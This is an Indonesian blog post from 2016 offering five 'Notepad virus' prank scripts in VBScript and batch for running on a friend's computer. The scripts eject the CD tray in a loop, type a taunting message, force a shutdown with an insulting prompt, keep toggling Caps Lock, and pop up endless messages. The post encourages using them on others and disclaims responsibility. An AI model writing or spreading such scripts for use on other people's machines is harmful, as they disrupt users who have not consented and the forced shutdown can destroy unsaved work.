Monday, 2 May 2016

Yuk Coba Bikin Virus Notepad Untuk Menjahili Temanmu!




Siapa sangka aplikasi notepad yang mungkin sebagian orang anggap hanya sekadar aplikasi catatan biasa ini mampu membuat sebuah virus.. Notepad ini ternyata mampu menciptakan virus yang cukup mampu membuat seseorang panik.. Betul,tujuan saya kali ini adalah menjahili seseorang. haha

Jika selama ini kalian hanya menggunakan notepad hanya sebagai alat untuk menulis catatan saja,tak ada salahnya jika  kalian mencoba trik jahil yang satu ini.. Yaa,hitung-hitung untuk iseng aja deh. 

Tapi yang perlu dicatat adalah,kamu jangan sesekali mencoba virus ini dengan cara menjalankannya dengan komputer sendiri yah,karena nanti malah kamu yang ngrasain tulahnya. Tapi kalau kamu tetep pengin nyoba gimana sensasi dari virus ini.. Ya monggo dipraktekkan saja. hehe

Apa aja sih kira-kira..?  check it out!



1. Membuka tutup CD/DVD-ROM dengan sendirinya


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Keterangan:

Nama: bebas
Type file: All file
Format: .vbs

Efek:
Ketika teman kamu menjalankan program ini,maka yang terjadi adalah.. CD/DVD-ROM teman kamu bakal kebuka secara otomatis.. Ketika teman kamu menutupnya,maka akan kembali terbuka,begitu juga seterusnya.



2. Membuat pesan dialog jahil


WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "


Keterangan:

Nama: bebas
Type file: All file
Format: .vbs

Efek:
Komputer temanmu bakal menampilkan pesan jahil yang bisa kamu tulis sesuai keinginan..  Jadi silahkan,kamu bisa mengubah pesan diatas sesuai keinginan kamu.



3. Membuat komputer shutdown otomatis



@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s


Keterangan:

Nama: bebas
Type file: All file
Format: .bat

Efek:
Ketika teman kamu menjalankan program ini,maka komputer tersebut akan melakukan shutdown secara paksa tanpa terkecuali. So,kurang jail apa dimananya coba. hehe



4. Membuat Caps lock selalu menyala



Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Keterangan:

Nama: bebas

Type file: All file
Format: .vbs

Efek:
Capslock temen kamu bakal selalu aktif,sehingga ketika dia sedang menulis.. Entah itu dimana saja,maka tulisannya akan menjadi huruf kapital semua.



5. Membuat pesan jahil muncul terus ngga mau ditutup



@ECHO off
:Begin
msg * Komputermu jelek banget
msg * Banting aja!
msg * Kalo ngga dirongsokin aja!!
msg * Lumayan kan,
msg * Duitnya bisa buat beli permen.
GOTO BEGIN

Keterangan:

Nama: bebas

Type file: All file
Format: .bat

Efek: 
Komputer temen kamu bakal munculin pesan jahil yang kamu tulis sesuai keinginan.. Bukan hanya itu,pesan tersebut juga bakal muncul terus-menerus. Bikin panik pastinya..


Perlu diingat bahwa 'virus-virus' diatas ngga bakal ngrusak komputer kok.. Jadi ngga usah takut.
Untuk menghentikan virus tersebut,ada beberapa yang memang harus melakukan restart terlebih dahulu,tapi tidak semuanya..

Silahkan dicoba.. Dan saya tak bertanggung jawab atas segala akibat yang terjadi karena ulah kejahilan anda. hehe

Rekomendasi Untuk Anda × +
No comments:
Write komentar